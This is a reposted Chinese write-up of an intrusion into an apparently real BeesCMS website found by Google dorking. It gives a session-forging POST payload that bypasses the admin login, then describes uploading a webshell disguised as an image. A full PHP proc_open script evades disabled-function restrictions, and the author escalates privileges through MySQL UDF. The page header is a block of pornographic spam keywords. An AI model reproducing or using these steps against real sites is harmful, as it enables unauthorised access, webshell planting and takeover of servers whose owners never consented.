日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

安全模式 提权_记一次渗透挖洞提权实战

發布時間:2025/3/8 编程问答 17 豆豆
生活随笔 收集整理的這篇文章主要介紹了 安全模式 提权_记一次渗透挖洞提权实战 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

摘要:這是一次挖掘cms通用漏洞時發現的網站,技術含量雖然不是很高,但是也拿出來和大家分享一下吧,希望能給一部分人帶來收獲。


0x01 進入后臺

在通過googlehack語法挖掘beescms時發現了這個站點
利用網上的payload,在/mx_form/mx_form.php?id=12頁面使用hackbarPOST以下數據

_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=100000000000000000000000000000000000

然后訪問/admin便可以直接進入后臺

0x02 拿shell

進入后臺后在‘添加產品模塊’處尋找到了上傳點

嘗試上馬,但提示‘上傳圖片格式不正確’,于是上傳圖片馬抓包,在repeater里更改后綴為php,然后go

根據回顯沒有看出是否上傳成功,但也沒說失敗。經過尋找在‘上傳圖片管理’處找到

點擊圖片發現解析了,直接菜刀連接,拿到shell

0x03 繞過安全模式

拿到shell后進入終端查看權限,但卻發現執行命令失敗,可能遠程啟用了安全模式

經過在網上一番查找得出:要找到未禁用的php執行函數。先上傳了一個查看phpinfo的腳本,找到已禁用的函數

發現proc_open函數未被禁用,于是找到如下php腳本

<?php $descriptorspec=array( //這個索引數組用力指定要用proc_open創建的子進程的描述符0=>array('pipe','r'), //STDIN1=>array('pipe','w'),//STDOUT2=>array('pipe','w') //STDERROR);$handle=proc_open('whoami',$descriptorspec,$pipes,NULL);//$pipes中保存的是子進程創建的管道對應到 PHP 這一端的文件指針($descriptorspec指定的)if(!is_resource($handle)){die('proc_open failed');}//fwrite($pipes[0],'ipconfig');print('stdout:
');while($s=fgets($pipes[1])){print_r($s);}print('===========
stderr:
');while($s=fgets($pipes[2])){print_r($s);}fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($handle);?>

上傳后可以執行命令,成功繞過安全模式

0x04 提權

上圖可以看出只是iis權限,能做的事很局限,所以要想辦法提權。
菜刀中雖然不能執行命令,但是可以查看文件,于是找到了數據庫配置文件

發現是mysql的數據庫,想到udf提權,于是上傳udf提權腳本(附件中)

登錄后導出udf便可以執行命令了

提權成功,但是不可以添加用戶,也不能開3389。


結語:希望路過的各位大佬可以指點迷津,也歡迎各位來找我交流探討,感謝閱讀。

參考鏈接:

PHP限制命令執行繞過https://www.cnblogs.com/R4v3n/articles/9081202.html?

作者:?PaperPen?

來源:先知社區

如有侵權,請聯系刪除

總結

以上是生活随笔為你收集整理的安全模式 提权_记一次渗透挖洞提权实战的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。